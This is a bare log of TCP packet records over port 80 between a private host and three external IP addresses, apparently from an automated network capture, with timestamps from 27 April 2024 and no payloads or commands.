Apr 27, 2024 01:31:12.654108047 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654140949 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.654144049 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654181957 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654218912 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654248953 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.654256105 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654292107 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654304981 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.654329062 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654366970 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654383898 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.654406071 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654443979 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654460907 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.654484034 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654520988 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654536963 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.654558897 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654596090 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654608011 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.654635906 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654671907 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654687881 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.654711008 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654747963 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654764891 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.654784918 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654824018 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654839993 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.654865026 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.654918909 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.825866938 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.825911045 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.825968027 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.825974941 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.826092005 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.826132059 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.826148033 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.826170921 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.826220036 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.826225996 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.826265097 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.826303005 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.826311111 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.826340914 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.826379061 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.826387882 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.826580048 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.826617956 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.826632977 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.826657057 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.826695919 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.826714039 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.826735020 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.826781034 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.826826096 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.826864958 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.826926947 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.826935053 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.827006102 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.827044010 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.827059984 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.827112913 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.827163935 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.827241898 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.827280998 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.827333927 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.827393055 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.827430010 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.827469110 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.827490091 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.827574968 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.827629089 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.827675104 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.827745914 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.827794075 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.827840090 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.827879906 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.827930927 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.827949047 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.827986956 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.828037024 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.828075886 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.828162909 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.828221083 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.828619003 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.828871965 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.828933954 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.828947067 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.828986883 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.829035997 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.829057932 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.829096079 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.829138994 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.829190016 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.829265118 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.829303026 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.829317093 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.829382896 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.829421997 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.829437971 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.829514027 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.829566002 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.829581976 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.829624891 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.829675913 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.829706907 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.829777956 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.829816103 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.829834938 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.829992056 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.830038071 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.830090046 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.830171108 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.830225945 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.830441952 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.830533981 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.830629110 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.830641985 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.830738068 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.830787897 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.830794096 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.830864906 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.830915928 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.830949068 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.831020117 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.831058025 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.831075907 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.831096888 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.831144094 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.831166983 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.831203938 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.831249952 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.831274986 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.831376076 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.831413031 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.831433058 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.831451893 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.831506014 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.831523895 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.831593037 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.831645012 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.831695080 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.831733942 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.831780910 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.831804991 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.831876040 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.831929922 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.831969023 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.832041025 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.832088947 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.998256922 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.998394966 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.998436928 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.998476028 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.998492956 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.998529911 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.998606920 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.998663902 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.998702049 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.998729944 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.998744011 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.998781919 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.998797894 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.998821020 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.998859882 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.998874903 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.998935938 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.998992920 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.998996019 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.999033928 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999070883 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999078989 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.999109030 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999146938 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999162912 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.999187946 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999227047 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999242067 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.999265909 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999303102 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999311924 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.999341965 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999381065 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999393940 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.999420881 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999458075 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999495029 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.999495029 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999533892 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999551058 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.999577045 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999615908 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999629974 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.999655008 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999694109 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999710083 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.999737024 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999773979 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999789000 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.999818087 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999855995 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999870062 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.999895096 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999933004 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:12.999952078 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:12.999970913 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000010014 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000024080 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000046015 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000085115 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000097990 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000143051 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000185966 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000195980 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000225067 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000272989 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000283957 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000312090 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000350952 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000371933 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000389099 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000396013 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000428915 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000437975 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000468016 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000478029 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000510931 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000520945 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000550985 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000560999 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000588894 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000597000 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000628948 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000634909 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000665903 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000677109 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000708103 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000714064 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000747919 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000757933 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000785112 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000793934 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000823021 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000830889 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000859976 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000866890 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000902891 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000912905 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000941992 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000958920 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.000979900 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.000988007 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.001019955 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.001039028 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.001058102 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.001063108 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.001096964 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.001104116 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.001135111 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.001142025 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.001174927 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.001188040 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.001216888 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.001226902 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.001256943 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.001270056 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.001296043 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.001306057 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.001334906 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.001343012 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.001374960 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.001384020 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.001411915 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.001416922 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.001455069 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.001461983 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.001492977 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.001501083 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.001538038 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.177095890 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.177202940 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.177432060 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.177495003 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.177582026 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 01:31:13.177647114 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.177689075 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 01:31:13.902990103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:14.075187922 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:14.075365067 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:14.075716019 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:14.246274948 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:14.607377052 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:14.607485056 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:15.826883078 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:15.895415068 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:16.022341013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.022443056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.054105043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.178347111 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:16.178390980 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:16.178466082 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:16.178466082 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:16.180488110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:16.247930050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.248029947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.248069048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.248126030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.248125076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.248166084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.248204947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.248218060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.248244047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.248282909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.248290062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.248322964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.248361111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.248373032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.248398066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.248442888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.350491047 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:16.442593098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.442636967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.442682981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.442765951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.442848921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.442894936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.442955971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.443095922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.443140030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.443196058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.443308115 CEST	80	49734	176.97.76.106	192.168.2.4
